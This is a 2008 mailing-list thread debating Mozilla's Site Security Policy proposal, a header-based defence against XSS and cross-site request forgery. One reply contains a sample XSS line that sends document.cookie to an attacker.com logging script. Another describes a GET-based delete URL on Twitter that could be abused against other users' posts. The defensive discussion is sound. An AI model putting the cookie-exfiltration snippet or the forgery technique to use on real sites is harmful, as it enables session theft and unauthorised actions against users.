
Site Security Policy


bsterne
Jun 4, 2008, 2:46:42 PM
I've recently published a proposal for Site Security Policy, a
framework for allowing sites to describe how content in their pages
should behave (thanks, Gerv):

http://people.mozilla.com/~bsterne/site-security-policy

I'm creating a placeholder for any discussion that comes out of that
publication. I hope to collect here people's ideas for proposed
functionality as well as other details which may be useful in creating
a common specification.

Gervase Markham
Jun 5, 2008, 1:40:51 PM
bsterne wrote:
> http://people.mozilla.com/~bsterne/site-security-policy

This is an interesting proposal. Here are some thoughts:

- Are we concerned about the bandwidth used by the additional headers,
or are the days of worrying about a few bytes overhead per request long
past?

- I am concerned about the performance implications of making a
preliminary HEAD request for every cross-site resource, which is needed
to enable Request-Source. Has this been analysed at all?

The impact would be significantly reduced if we were to do such checks
only for unsafe HTTP verbs (i.e. POST rather than GET). The vast
majority of cross-site requests (e.g. images, searches) are GETs.

- "When any Script-Source instruction is received by the browser script
enforcement mode is enabled and only white-listed hosts will be treated
as valid sources of script for the page. Any script embedded within the
page and any script included from non-white-listed hosts will not be
executed."

This means that all script has to be in external .js files. (This is one
of the differences in approach from Content-Restrictions.) While this is
an encouragement of best practice in JS authorship (unobtrusive script,
addition of event handlers using addEventListener() and so on), would
site authors find it too restrictive? (See the sketch at the end of this
list for what that change looks like in practice.)

- I am assuming that the script-removal required by Script-Source would
be done at parse time. Is that correct?

- Is it worth having a special value for Script-Source and
Request-Target, such as "domain", to enable all sites in the same domain
(as defined by the Public Suffix List, http://www.publicsuffixlist.org)
to receive requests, rather than making the site owner list them explicitly?

- Report-URI is a truly fantastic idea. It should support page- and
site-relative URIs too, in order to keep the header size down. e.g.
Report-URI: /error-collector.cgi

- Perhaps via an extension, the browser could also support notifying the
user/web developer of policy violations.

- Can you more carefully define the relative priority and order of
application of allow and deny rules in e.g. Script-Source?

- Do you plan to permit these policies to also be placed in <meta
http-equiv=""> tags? There are both pros and cons to this, of course.

Hope that's helpful :-)

Gerv

danberall
Jun 5, 2008, 4:45:45 PM
> - Do you plan to permit these policies to also be placed in <meta
> http-equiv=""> tags? There are both pros and cons to this, of course.

Might it be a valuable idea to support a similar reference mechanism
to the way that the P3P compact policy is supported?

:: The location of the policy reference file can be indicated using
one of four mechanisms. The policy reference file
:: 1. may be located in a predefined "well-known" location, or
:: 2. a document may indicate a policy reference file through an
HTML link tag, or
:: 3. a document may indicate a policy reference file through an
XHTML link tag, or
:: 4. through an HTTP header.

(See http://www.w3.org/TR/P3P/#ref_syntax.)

A similar hierarchy could be implemented and using a "known location"
would address the bandwidth issue for sites that have this concern. I
do agree that there are specific cons to allowing tags within the HTML
source. Perhaps an overarching policy declaration could be
implemented in the "known location" that allows or disallows the HTML
or XHTML tag.

As Gerv has previously proposed, I also would like to see some form of
Content Restrictions implemented (http://www.gerv.net/security/content-
restrictions/). I'm thinking specifically of the "header" option. I
wonder if forcing all the JavaScript content to be externally
referenced could be too restrictive for some application models. It
might be acceptable for some organizations to assume the risk of
allowing JavaScript solely in the HTML head of the page, as this
would allow page-specific event handlers to be delivered more easily.
While user-supplied data sometimes does occur between the head tags,
this risk might be acceptable for some applications.

Thanks.
Danny

Gervase Markham
Jun 6, 2008, 5:05:02 AM
danberall wrote:
> A similar hierarchy could be implemented and using a "known location"
> would address the bandwidth issue for sites that have this concern.

Leaving aside the merits or otherwise of the rest of your suggestion,
"Known location" is generally bad - it means we put loads of 404 errors
in the log of sites which don't have such a file. This is the way
favicons work, and site developers hate it.

Gerv

boba...@gmail.com
Jun 6, 2008, 4:23:53 PM

One of the most important features lacking, IMHO, is the ability to
restrict what scripts that are 'script src'd' from other hosts can do.
Currently they have full DOM access, which is contributing to drive-by
malware on ad networks and other nastiness. We need the ability to
allow JavaScript to be hosted on a third-party domain, but to restrict
what resources that JS can access. For example, allow an ad network to
create image objects with links, but disallow cookie access or
redirections. Lots of possibilities here.

We also should discuss restricting certain technologies from being
used. For example, instruct the browser to disallow ActiveX/Flash/
applets/JavaFX/Silverlight from executing on the domain unless
explicitly defined in the policy as an allowed behavior. Sure, the
browser has no ability to restrict what Flash/other technologies can do
once they are started, but it can restrict them from being loaded/called
in the first place.

There are additional discussions going on at
http://jeremiahgrossman.blogspot.com/2008/06/site-security-policy-open-for-comments.html
discussing this topic as well.

Great to see this moving forward.

Regards,
- Robert Auger
http://www.webappsec.org/


Nils Maier
Jun 7, 2008, 7:47:10 PM

I just "stumbled" through the code and noticed a few things and have a
few suggestions:

* a lot of reinvent the wheel code is in there, like getHostFromURL
(instead of using nsIURI/nsIURL/nsIEffectiveTLDService).

* A regex-based home-brewed HTML parser. I wonder how good it is, and how
good it will get... Bad people are known to be quite creative when it
comes to finding ways to obscure injections. (http://php-ids.org/)
I know getting this right is quite tricky; I implemented such a thing
myself, but after some months somebody figured out how to circumvent it...
I don't know if there is a reliable way to "hijack" the DOM before any
scripts are executed, but I guess that would be a better approach, as you
then get what the rendering engine gets as well.

* External scripts might be prohibited from loading by implementing
nsIContentPolicy (like Adblock Plus does for example, and I think
noscript does as well.)

* clean = this.data.replace(/google/ig,'yahoo'); Huh? Prototyping, eh? ;)

* this.status = "On" | "Off"... What happened to booleans?

Interesting idea indeed. Glad somebody started to implement it.
Maybe you should get in touch with Giorgio of NoScript fame. He is very
knowledgeable in this area, and furthermore I think it might be
interesting to implement this in NoScript to some extent as well.

Cheers
Nils

Gervase Markham
Jun 9, 2008, 5:20:23 AM
boba...@gmail.com wrote:
> One of the most important features lacking IMHO is the ability to
> restrict what hosts that are 'script src'd' can do. Currently they
> have full DOM access
> which is contributing towards drive by malware on ad networks and
> other nastiness.

Not if the ads are in an <iframe>, surely?

> We need the ability to allow Javascript to be hosted
> on a third party domain, but to restrict what resources that JS can
> access. For example allow an ad network to create image objects with
> links, but disallow cookie access or redirections. Lots of
> possibilities here.

I believe Hixie has recently proposed some HTML5 additions in this area.
Have you seen them?

Gerv

Terri
Jun 9, 2008, 3:40:18 PM
We've been doing some very similar work here in the Carleton Computer
Security Lab over the past year, and we put out a tech report in April
that I think would be really helpful:

http://www.scs.carleton.ca/research/tech_reports/index.php?Abstract=tr-08-07_0007&Year=2008

For one, we did a bunch of analysis of the security and performance of
our system that will be interesting to you and possibly some of the
numbers will also apply to SSP.

There's a lot of small differences between our proposals, and I'd like
to point out some differences between our "soma-approval" and your
"request-source" that are important:

(1) Because the request-source query involves getting the headers for
the resource, it can still be used as a security leak to get
information out of the browser by placing it in the URI.

(2) Request-source is on a per-resource basis. Soma-approval is done
on a per-site basis. We have some estimated performance numbers that
might be very interesting to you here, because we clocked in around
13% overhead without caching (6% with an estimated caching rate).
These were overestimations based on average load times per site, but
there are some preliminary numbers for Gervase, who asked about them.

My colleagues and I would really love to see this sort of policy
implemented in browsers, and it would be great if we could help
produce a specification that is workable and secure. There's all
sorts of little things I'd like to discuss, but I think it makes more
sense to let you read our report first.

brandon...@gmail.com
Jun 10, 2008, 2:35:07 PM
On Jun 5, 10:40 am, Gervase Markham <g...@mozilla.org> wrote:
> - Are we concerned about the bandwidth used by the additional headers,
> or are the days of worrying about a few bytes overhead per request long
> past?

I am not particularly concerned with the additional bandwidth, nor
have I heard any specific objections in that area. I think that a
larger impact may be created, though, by the additional round trips
required by the CSRF aspects of the proposal (which you bring up
below).

> - I am concerned about the performance implications of making a
> preliminary HEAD request for every cross-site resource, which is needed
> to enable Request-Source. Has this been analysed at all?

Analyzed, no... but I agree that the Request-Source checks should only
be made for non-safe methods. The proposal includes that statement,
though perhaps it could have been made more prominently:
http://people.mozilla.com/~bsterne/site-security-policy/details.html#non-safe

> The impact would be significantly reduced if we were to do such checks
> only for unsafe HTTP verbs (i.e. POST rather than GET). The vast
> majority of cross-site requests (e.g. images, searches) are GETs.

I totally agree.

> - "When any Script-Source instruction is received by the browser script

> enforcement mode is enabled ..."


>
> This means that all script has to be in external .js files. (This is one
> of the differences in approach from Content-Restrictions.) While this is
> an encouragement of best practice in JS authorship (unobtrusive script,
> addition of event handlers using addEventListener() and so on) would
> site authors find it too restrictive?

This is admittedly the most cumbersome aspect of the proposal for site
authors. The assumptions I have been going on that led to this model
are twofold:
1. It is extremely difficult to differentiate "intended" inline
script from "injected" inline script and a clear boundary can be
established if we simply require that all JavaScript be included from
external files from white-listed hosts.
2. Sites that wish to utilize Site Security Policy will perhaps be
willing to do more work in reorganizing their pages, at least for
those resources that they consider "sensitive" enough to justify using
SSP.

> - I am assuming that the script-removal required by Script-Source would
> be done at parse time. Is that correct?

Yes. The add-on that I wrote is a total hack (see Nils' comments
below) and is for proof-of-concept purposes only. A permanent
implementation (for Mozilla) will likely be a patch to the HTML and
XML parsers that creates a mode for disabling inline and non-white-
listed scripts which can be toggled on or off per a site's policies.

> - Is it worth having a special value for Script-Source and
> Request-Target, such as "domain", to enable all sites in the same domain
> (as defined by the Public Suffix List, http://www.publicsuffixlist.org)
> to receive requests, rather than making the site owner list them explicitly?

Yes. I think this is worthwhile and would be useful, for example, for
authors whose content may be subject to move periodically and who
don't want to hard code server names into their policies.

> - Perhaps via an extension, the browser could also support notifying the
> user/web developer of policy violations.

Yes, that would be very easy to support as well and would provide
useful information to interested users.

> - Can you more carefully define the relative priority and order of
> application of allow and deny rules in e.g. Script-Source?

Yes. I made comments in the add-on code that does this, but you're
right that it should be explained in the proposal as well. For
example, if a host matches any deny rule, that rule will take
precedence over any rule allowing the host.
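
To illustrate in rough JavaScript (the function and rule-matching names
here are made up, not taken from the add-on):

function hostPermitted(host, allowRules, denyRules) {
  for (var i = 0; i < denyRules.length; i++) {
    if (ruleMatches(denyRules[i], host))
      return false;             // any matching deny rule wins
  }
  for (var j = 0; j < allowRules.length; j++) {
    if (ruleMatches(allowRules[j], host))
      return true;
  }
  return false;                 // assuming default-deny when nothing matches
}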

> - Do you plan to permit these policies to also be placed in <meta
> http-equiv=""> tags? There are both pros and cons to this, of course.

Yes, I've thought about this as well, and I think http-equiv will
probably be useful for the set of users who don't have CGI privileges
on their server and can't set custom headers the traditional way.

Also, I'm seeing a lot of suggestions/requests (off newsgroup mostly)
that policies be defined in an external file rather than via headers.
This would obviously be closer to Adobe's Flash model. I have heard
you, in this discussion and previously, bring up the issue of the log
spam created by all the 404s generated on sites that don't have a
policy file. What about the following idea (from Dan Veditz): if a
server wants to set Site Security Policy, it sends an HTTP header or
http-equiv meta tag that points the user agent to the location where
the policy file sits.
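
Purely to illustrate (the header name here is made up, nothing is
settled), that might look something like:

X-SSP-Policy-URI: /ssp/policy.xml

and the user agent would then fetch the policy from that location.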

Thoughts?

> Hope that's helpful :-)

It is, as always.

Cheers,
Brandon

brandon...@gmail.com
Jun 10, 2008, 2:54:25 PM
On Jun 7, 4:47 pm, Nils Maier <Maier...@web.de> wrote:
> * a lot of reinvent the wheel code is in there, like getHostFromURL
> (instead of using nsIURI/nsIURL/nsIEffectiveTLDService).
>
> * A regex-based home-brewed HTML parser. I wonder how good it is, and how
> good it will get... Bad people are known to be quite creative when it
> comes to finding ways to obscure injections...

Thank you for your interest and scrutiny here, Nils. As I mentioned
in my reply to Gerv, the add-on is only a proof-of-concept hack and
differs greatly from the approach Mozilla would likely take in a
permanent implementation. A regex-based HTML and script parser was a
quick and dirty way to get the job done. We have thousands of
developer hours already invested in our HTML and XML parsers. I would
not want to reimplement any of that code when it's already been so
rigorously tested.

> * clean = this.data.replace(/google/ig,'yahoo'); Huh? Prototyping, eh? ;)
>
> * this.status = "On" | "Off"... What happened to booleans?

Yep, thanks for pointing these out. Both have been fixed and the add-
on package updated.

> Maybe you should get in touch with Giorgio of NoScript fame. He is very
> knowledgeable in this area, and furthermore I think it might be
> interesting to implement this in NoScript to some extent as well.

I am sure that Giorgio will be involved in the design/implementation.
He has already provided some useful comments on a few of the
discussions I have seen.

Thanks,
Brandon

Gervase Markham
Jun 12, 2008, 6:56:33 AM
bst...@mozilla.com wrote:
> Analyzed, no... but I agree that the Request-Source checks should only
> be made for non-safe methods. The proposal includes that statement,
> though perhaps it could have been made more prominently:
> http://people.mozilla.com/~bsterne/site-security-policy/details.html#non-safe

Yes; I think the current write-up is confusing on this point.

>> This means that all script has to be in external .js files. (This is one
>> of the differences in approach from Content-Restrictions.) While this is
>> an encouragement of best practice in JS authorship (unobtrusive script,
>> addition of event handlers using addEventListener() and so on) would
>> site authors find it too restrictive?
>
> This is admittedly the most cumbersome aspect of the proposal for site
> authors. The assumptions I have been going on that led to this model
> are twofold:
> 1. It is extremely difficult to differentiate "intended" inline
> script from "injected" inline script and a clear boundary can be
> established if we simply require that all JavaScript be included from
> external files from white-listed hosts.

My attempt at making such a differentiation is here:
http://www.gerv.net/security/script-keys/

But perhaps it's unnecessary. It would be useful to get web developer
feedback on this point. If it is too cumbersome, the proposal will not
be adopted. Perhaps we could take it to the WASP or other
web-development forums for discussion?

> 2. Sites that wish to utilize Site Security Policy will perhaps be
> willing to do more work in reorganizing their pages, at least for
> those resources that they consider "sensitive" enough to justify using
> SSP.

My desire in writing Content-Restrictions (although this may have got
somewhat obscured as the spec evolved) was that the gains were
incremental - the more work you did, the more benefit you'd gain. So you
could just add a header encoding what your site does now, for some
protection, or you could rearrange the site for greater protection. Half
a loaf is better than no bread.

>> - Can you more carefully define the relative priority and order of
>> application of allow and deny rules in e.g. Script-Source?
>
> Yes. I made comments in the add-on code that does this, but you're
> right that it should be explained in the proposal as well. For
> example, if a host matches any deny rule, that rule will take
> precedence over any rule allowing the host.

OK. When might we expect an update?

>> - Do you plan to permit these policies to also be placed in <meta
>> http-equiv=""> tags? There are both pros and cons to this, of course.
>
> Yes, I've thought about this as well, and I think http-equiv will
> probably be useful for the set of users who don't have CGI privileges
> on their server and can't set custom headers the traditional way.

Right. It would require a parsing restart, just as a charset change I
believe still does. But that's an unavoidable penalty.

> Also, I'm seeing a lot of suggestions/requests (off newsgroup mostly)
> that policies be defined in an external file rather than via headers.
> This would obviously be closer to Adobe's Flash model. I have heard
> you, in this discussion and previously, bring up the issue of the log
> spam created by all the 404s generated in sites that don't have a
> policy file. What about the following idea (from Dan Veditz): If a
> server wants to set Site Security Policy, it sends a HTTP header or
> http-equiv meta tag that points the user agent to the location where
> the policy file sits.

Could do. Although if we are doing that, perhaps the <link> tag might be
a more appropriate method in HTML.
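(Something along the lines of <link rel="security-policy"
href="/ssp-policy"> -- the rel value and path here are purely
illustrative, not a settled syntax.)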

Have you thought about how much SSP applies to non-HTML (e.g. XML)
content? I tried to make Content Restrictions generalizable, at least in
principle, to other sorts of content which contained embedded script or
embedded documents.

Gerv

Gervase Markham
Jun 12, 2008, 7:07:05 AM
Terri wrote:
> There's a lot of small differences between our proposals,

And some big ones, if (for example) SSP ends up restricted to POST.

> and I'd like
> to point out some differences between our "soma-approval" and your
> "request-source" that are important:
>
> (1) Because the request-source query involves getting the headers for
> the resource, it can still be used as a security leak to get
> information out of the browser by placing it in the URI.

True. SSP in its current form is not a mechanism for locking down all
page communications.

> (2) Request-source is on a per-resource basis. Soma-approval is done
> on a per-site basis. We have some estimated performance numbers that
> might be very interesting to you here, because we clocked in around
> 13% overhead without caching (6% with an estimated caching rate).
> These were overestimations based on average load times per site, but
> there's some prelim numbers for the Gervase, who asked about them.

Are those page load time increases? It could just be the implementation
mechanism you used, but I would suspect that either number would be
unacceptable here. Even 1% is a big deal. The headers approach has the
significant advantage of no page load increase just through deployment;
the delay comes when you try and make a cross-domain POST.

The restriction of SSP to POST also means that it wouldn't be useful to
prevent "bandwidth stealing".

Gerv

Terri
Jun 13, 2008, 5:49:19 PM
On Jun 12, 7:07 am, Gervase Markham <g...@mozilla.org> wrote:
>True. SSP in its current form is not a mechanism for locking down all
>page communications

Shouldn't it be? Site admins will already have to provide all the
necessary information in order to be SSP compliant, so it makes sense
to me to give them extra protection.

The only reason I can think of not to do this is if the implementation
turns out to have a huge overhead, but although I was disappointed
with our estimated numbers, I'm confident we can reduce those in
practice. (see below.)

> > 13% overhead without caching (6% with an estimated caching rate).
> > These were overestimations based on average load times per site,

> Are those page load time increases? It could just be the implementation
> mechanism you used, but I would suspect that either number would be
> unacceptable here. Even 1% is a big deal. The headers approach has the
> significant advantage of no page load increase just through deployment;
> the delay comes when you try and make a cross-domain POST.

Those are estimates of round-trip times, once per cross-domain site, to
get a policy file. They did not come from our implementation at all.
They are due to network delay, not processing time.

I'd say that these are very inflated numbers because we used the
average request time for a given site, even though most of the files
loaded from a given site would be much bigger than any policy file.
They can probably be treated as a maximum load increase. Note: our
test cases included some sites with very high latency, which probably
brought that 6% average increase up even higher than it would be if
you weren't, say, getting info from a very laggy site in France as we
were.

With smaller policy files (or headers), the cost should be fairly
minimal, but I would say we should do some tests before assuming that
it's going to be negligible, especially if you're talking about adding
headers to everything. If we restricted our proposal to POST
requests, as proposed for SSP, then we end up with very similar
estimated performance numbers.

> The restriction of SSP to POST also means that it wouldn't be useful to
> prevent "bandwidth stealing".

It also means that it wouldn't be that useful to prevent cross site
request forgery (realistically, "safe" operations aren't unless your
web programmers abide by them, and I would venture that many don't).

Gervase Markham
Jun 17, 2008, 9:25:29 AM
Terri wrote:
> On Jun 12, 7:07 am, Gervase Markham <g...@mozilla.org> wrote:
>> True. SSP in its current form is not a mechanism for locking down all
>> page communications
>
> Shouldn't it be?

What's the use case for locking down all page communications?

> Site admins will already have to provide all the
> necessary information in order to be SSP compliant, so it makes sense
> to me to give them extra protection.

Total lockdown is a side-effect of a particular implementation strategy.
If you can provide a use case, it may influence which strategy is used.

>> The restriction of SSP to POST also means that it wouldn't be useful to
>> prevent "bandwidth stealing".
>
> It also means that it wouldn't be that useful to prevent cross site
> request forgery (realistically, "safe" operations aren't unless your
> web programmers abide by them, and I would venture that many don't).

I would venture that most do. Doing a web purchase via a GET runs into
problems with e.g. the user doing a Reload.

Gerv

Terri
Jun 23, 2008, 11:47:25 AM
On Jun 17, 9:25 am, Gervase Markham <g...@mozilla.org> wrote:
> What's the use case for locking down all page communications?

The traditional one: XSS cookie-stealing attacks like this:

var image = new Image();
image.src = 'http://attacker.com/log.php?cookie=' +
    encodeURIComponent(document.cookie);

A more modern one: iframe injections,
e.g. http://www.webpronews.com/topnews/2008/03/28/major-sites-hit-with-iframe-injection-attacks

> > It also means that it wouldn't be that useful to prevent cross site
> > request forgery (realistically, "safe" operations aren't unless your
> > web programmers abide by them, and I would venture that many don't).
> I would venture that most do. Doing a web purchase via a GET runs into
> problems with e.g. the user doing a Reload.

We did some tests in the lab and in a quick check of a few retailers
didn't find sites that would allow you to complete web purchases with
GET requests, but we found several places (I believe thinkgeek and
maple music were some of the targets) that let you add to a cart with
GETs, so we can't really claim that GET requests do nothing to change
the state of a given web application, even though I believe the specs
say they shouldn't.

I hadn't been thinking about purchases, though: I was actually
thinking in terms of using GET requests to add comments/forum posts to
a site, which I have seen, and could be used to make self-propagating
web-worms a la Samy, to insert iframe exploits in vulnerable sites, or
just to use users' credentials to post spam including links to
dangerous sites.

Terri
Jun 23, 2008, 12:16:33 PM
Oh, I should probably also mention that we did an HTML conversion of
the tech report, so if anyone hates reading PDFs or just prefers HTML
(I know a surprising number of people who do), you can check it out
either on my university website:
http://www.scs.carleton.ca/~toda/doc/soma/

or my personal one:
http://terri.zone12.com/doc/academic/soma/

Gervase Markham
Jun 24, 2008, 5:04:26 AM
Terri wrote:
> On Jun 17, 9:25 am, Gervase Markham <g...@mozilla.org> wrote:
>> What's the use case for locking down all page communications?
>
> The traditional one: XSS cookie-stealing attacks like this:
>
> var image = new Image();
> image.src = 'http://attacker.com/log.php?cookie=' +
> encodeURIComponent(document.cookie);

But you are confusing Request-Source and Request-Target.

Request-Target is a set of headers shipped with the page; it would
prevent contacting attacker.com at all.

This thread thus far has been about Request-Source. You said:

"(1) Because the request-source query involves getting the headers for
the resource, it can still be used as a security leak to get information
out of the browser by placing it in the URI."

It's true that information travels this way, but the "leaky" request
will never be made unless attacker.com is in the Request-Target
whitelist. So there is no leak.

> We did some tests in the lab and in a quick check of a few retailers
> didn't find sites that would allow you to complete web purchases with
> GET requests, but we found several places (I believe thinkgeek and
> maple music were some of the targets) that let you add to a cart with
> GETs, so we can't really claim that GET requests do nothing to change
> the state of a given web application, even though I believe the specs
> say they shouldn't.

So there's a possible risk for people who don't review the contents of
their cart before hitting "Buy"? :-)

> I hadn't been thinking about purchases, though: I was actually
> thinking in terms of using GET requests to add comments/forum posts to
> a site, which I have seen,

Really? I can't remember seeing this either. But perhaps I wasn't paying
attention.

> and could be used to make self-propagating
> web-worms a la Samy, to insert iframe exploits in vulnerable sites, or
> just to use users' credentials to post spam including links to
> dangerous sites.

Again, Request-Target is the mitigating step here.

Gerv


Terri
Jun 24, 2008, 1:02:55 PM
> It's true that information travels this way, but the "leaky" request
> will never be made unless attacker.com is in the Request-Target
> whitelist. So there is no leak.

Ah! You're right, I had confused that for some reason. If all
requests are still covered by Request-Target, then we're good for that
kind of leak. (I was somehow thinking that you were talking about
checking only POST requests, which was the reason for my concern.)

Looking at it again, the thing I think might be missing from Request-
Target is the "other side" that you do for scripts with Request-Source
(or that flash does with crossdomain.xml). There's no way for the
external content provider to say "no, that's an action-causing script,
we don't let other people use that" on requests that are "safe". I
think if you put that in, you'd be able to stop more XSRF than you can
with only the one check.

Example:
1. A portal site includes info from a social networking site (i.e.
your friends' latest updates).
2. It puts *.social into its Request-Target list because it wants
things to "just work" and that seems easiest.
3. Said portal site has an XSS exploit and someone inserts XSRF code
for use on the social site.
4. It works when someone visits that page.

If the social site can use Request-Source to say "no" when someone
tries to do a GET on, say, *.action.social, then we can block a few more
attacks. But Request-Source doesn't cover GET requests.

>So there's a possible risk for people who don't review the contents of
>their cart before hitting "Buy"? :-)

*laugh* I know, the prospect is terrifying. ;)

But adding an item to a cart and adding a friend are very similar
actions, and the latter might have privacy implications. I've
definitely seen a simple karma-adding exploit on Joomla, which is
just amusing and harmless unless, for example, you're using that karma
to determine whose stories get auto-posted to the front page of a
site.

And as I said, I've seen forum software (my fuzzy memory says it was
also Joomla, but it could have been phpBB or another package) that
allowed posting using a GET request (because there was no check to see
whether the variables came in through POST or GET -- PHP is awfully
friendly to this...).

Terri

Terri
Jun 24, 2008, 1:59:41 PM
Messed around a bit and noticed that you can indeed post using a GET
request to Twitter. This looks to be somewhat XSRF-protected with an
authorization token, so hopefully it's not dead simple to exploit.

However, the delete requests are just simple GETs of the form
http://twitter.com/status/destroy/842624743

I just loaded that URL separately in my browser and it deleted the
associated post, since I was logged in. It doesn't work if I try to
delete other people's posts, but I *could* get their post numbers out of
the HTML if I wanted to target someone. Or you could just run through
random numbers and delete random posts if one matched up.

Twitter was the 3rd site I tried to exploit in this manner (the Joomla-
running site and the phpBB-running site were thankfully both resistant
to me posting using GETs).

I'd say if it takes me that little time to find one... GET requests
probably aren't as safe as the specs say they are.

brandon...@gmail.com
Jun 24, 2008, 2:42:23 PM
On Jun 12, 3:56 am, Gervase Markham <g...@mozilla.org> wrote:

> bste...@mozilla.com wrote:
> > Analyzed, no... but I agree that the Request-Source checks should only
> > be made for non-safe methods.
> Yes; I think the current write-up is confusing on this point.

I've updated the proposal to make this aspect a bit more clear:
http://people.mozilla.org/~bsterne/site-security-policy/details.html

> >> This means that all script has to be in external .js files. (This is one
> >> of the differences in approach from Content-Restrictions.) While this is
> >> an encouragement of best practice in JS authorship (unobtrusive script,
> >> addition of event handlers using addEventListener() and so on) would
> >> site authors find it too restrictive?

One interesting proposal I have been sent via private email was from
Amit Klein, who suggests potentially allowing authors to include a
single, zero-parameter function within event-handling attributes,
which could be defined in an external file. From his email:

"""
Perhaps you should allow something like a single parameter-less
function invocation inside handlers, e.g. allow this:

<img id="img123" onClick="onclickhandlerfoo()">

Obviously you can't allow parameterized functions, as this will open
up security holes, e.g.

eval("something bad")

or

innocent_function(123,eval("bad stuff here"),456)
"""

I really like this idea, as I think it lowers the barrier to entry to
use Site Security Policy. I think (though don't have data to back
this up) that there are a fair number of authors who would be
comfortable moving their JS function definitions to external files,
but wouldn't necessarily be comfortable attaching their own event
listeners to DOM objects. This might be a great middle-ground
solution.

> >> - Can you more carefully define the relative priority and order of
> >> application of allow and deny rules in e.g. Script-Source?

I also updated the proposal to be more clear about relative rule
priorities.

> Have you thought about how much SSP applies to non-HTML (e.g. XML)
> content? I tried to make Content Restrictions generalizable, at least in
> principle, to other sorts of content which contained embedded script or
> embedded documents.

Yes, I think that SSP should generalize to other document types,
certainly XML, that can contain active content. When I get a few
moments, I will also make this more clear in the proposal.

Thanks, Gerv, for the feedback, and I will keep you and the other
participants in this discussion updated as we move toward creating an
open standard (W3, WHATWG, etc.).

Incidentally, I have been receiving some really great, detailed
feedback from various security researchers (mostly private email at
this point) and I hope to persuade them to join the standard-creating
process.

Cheers,
Brandon

Gervase Markham
Jun 25, 2008, 7:48:42 AM
Terri wrote:
> There's no way for the
> external content provider to say "no, that's an action-causing script,
> we don't let other people use that" on requests that are "safe".

That's right - because if there was, we'd have to do checks on every
cross-domain request a page made. And the performance impact of all the
HEAD requests would be significant.

If the implementation were to switch from that to a single policy file,
such as crossdomain.xml, then that problem would be eliminated - but a
set of different problems would be created.

Again, I think we need to focus on the fact that SSP is a
belt-and-braces approach. If you use sensible coding practices, it helps
you when there's a slip-up. If you do non-idempotent operations using
GET, then it (the current formulation, at least) doesn't help you.

Gerv

Gervase Markham
Jun 25, 2008, 8:22:09 AM
bst...@mozilla.com wrote:
> I've updated the proposal to make this aspect a bit more clear:
> http://people.mozilla.org/~bsterne/site-security-policy/details.html

The documentation for Request-Source is now more complete, but it's a
bit jumbled. I would make bullet 4 into bullet 2, and remove the second
sentence because it's repeated in (new) bullet 3.

The allow/deny priority system: is that the same as used by e.g.
.htaccess? If not, should it be?

You didn't include the feature of a special value for the local domain.
Can we abuse localdomain and localhost, or would those be supposed to
refer to the user's computer rather than the server?
X-SSP-Script-Source: allow *.localdomain
X-SSP-Script-Source: allow localhost

I note that in Content-Restrictions, I used "this":
X-SSP-Script-Source: allow this

We might also consider a special value for Script-Source of "head", if
we are looking for ways to make it more palatable and
easily-implementable for web authors.
X-SSP-Script-Source: allow head; allow *.example.com; deny public.example.com

You may want to consider rethinking the names of the headers. At the
moment, you would expect Script-Source and Request-Source to be
parallel, but in fact Script-Source does something very similar to
Request-Target, but just for script. (You need to include a note that,
presumably, the restrictions are combined for script - the script access
has to be allowed by both if both are present.) As the words Source and
Target can be ambiguous, I would therefore suggest:

SSP-Script-Host
SSP-Request-Origin
SSP-Request-Host
SSP-Report-URI

We do need to continue to think about the performance impact of
Request-Source/Request-Origin. One option would be to have the site able
to return a policy file in the body of the response to a HEAD request,
which would define policy for that request and the entire site as well.
This avoids the "well-known URL" problem, and gives the option of both
page-specific responses and a general response. Again, perhaps a middle
ground.

> One interesting proposal I have been sent via private email was from
> Amit Klein, who suggests potentially allowing authors to include a
> single, zero-parameter function within event-handling attributes,
> which could be defined in an external file.

Hmm...

It's not quite that simple. See the quirksMode.org page on inline event
handlers:
http://www.quirksmode.org/js/events_early.html

If you want to permit suppression of the default action using an inline
style, you may need to allow at least "return functionWithNoParams()".
There are other ways to prevent the default action, but this one is
quite familiar to people.

Also, people often want to pass "this" or "event" to their event
handlers so they know which item was clicked on or have access to event
properties. More info on the latter here:
http://www.quirksmode.org/js/events_access.html
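
For example, both of these common inline patterns fall outside a strict
zero-parameter rule (the markup here is purely illustrative):

<a href="/fallback" onclick="return confirmDelete()">Delete</a>
<img src="thumb.png" onclick="showFullSize(this, event)">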

It's beginning to look like this might not fly...

Gerv

glenn....@gmail.com
Jul 10, 2008, 11:47:02 AM
Thought I'd get involved in the conversation (full disclosure: I'm
involved with the SOMA paper that Terri has been discussing).

The point of both lines of work (both yours and ours) is to attempt to
reduce the number of XSS and XSRF vulnerabilities which exist on the
web today. We have gone about it in different ways, both of which
have merit in their own areas. With our approach, the
configuration is centralized, and does not rely on developers to
differentiate between safe and unsafe operations. With your approach,
the network overhead is lower and you allow configuration at per-page
granularity.

In terms of the safe vs. unsafe requests, perhaps I can lend some
insight. The whole reason we have these XSS and XSRF attacks in the
first place is because developers have messed up. XSS 'can' be solved
by proper input validation, and XSRF attacks 'can' be solved by using
random identifiers in the links that perform an operation or examining
the Referer HTTP header. The problem is that although solutions exist
to both of these problems, developers have not properly implemented
the solution. With your approach of SSP and safe requests, you are
again relying on the developer to use the solution correctly, and put
all modifications behind a POST request. You have not removed the
reliance on the developer to code correctly, just simply shifted it to
a different 'thing' that they have to do. From previous conversation
with Terri, asking for an example of where a GET request can be used
to effect change on a website is asking for us to find a security
vulnerability in a website, since this is basically the definition of
an XSRF. Large sites are going to be well protected against this type
of thing, but I'm sure if you look at any of the recent CERT
vulnerabilities regarding XSRF or XSS you'll notice that they are all
exploitable through GET requests. In our work, we realized that the
developer could not be relied upon to do things correctly all the time
and hence we chose the approach of protecting against GET requests.

Related to the POST vs. GET arguments above is the fact that the only
way of doing a POST request currently is by submitting a form. While
browsers have gotten better at being able to customize the appearance
of a submit button, they are still in no way perfect, and hence some
of the visual style approaches that are possible on things like
<a>...</a> are not possible on the <input> submit element. The re-
arranging of the text (going from between the opening and closing <a>
element to inside the value attribute of the input element) also
contains several restrictions. A lot of HTML is usable inside the <a>
and </a> but only plain-text is allowed inside the value attribute of
the input element. This may have potential side-effects for visually
impaired users and other groups as well. I don't believe we can quite
rely on JavaScript yet to solve this either, as a lot of screen
readers don't support full JavaScript. The way I see it, in order to
make a usable site which is also visually appealing, the only choice
right now is GET.

It would be good to work together to come out with a policy that
protects against XSS and XSRF. Both our proposals attempt to do this,
but in slightly different ways. Is it possible to combine features of
both in developing an even better solution? I'm willing to work with
you to accomplish this goal.

We have posted our code on our website
(http://ccsl.carleton.ca/software/soma). We believe our code may be of
use to you, as we
encountered some of the same issues in attempting to write a policy
checker add-on. Your implementation would probably be easier if you
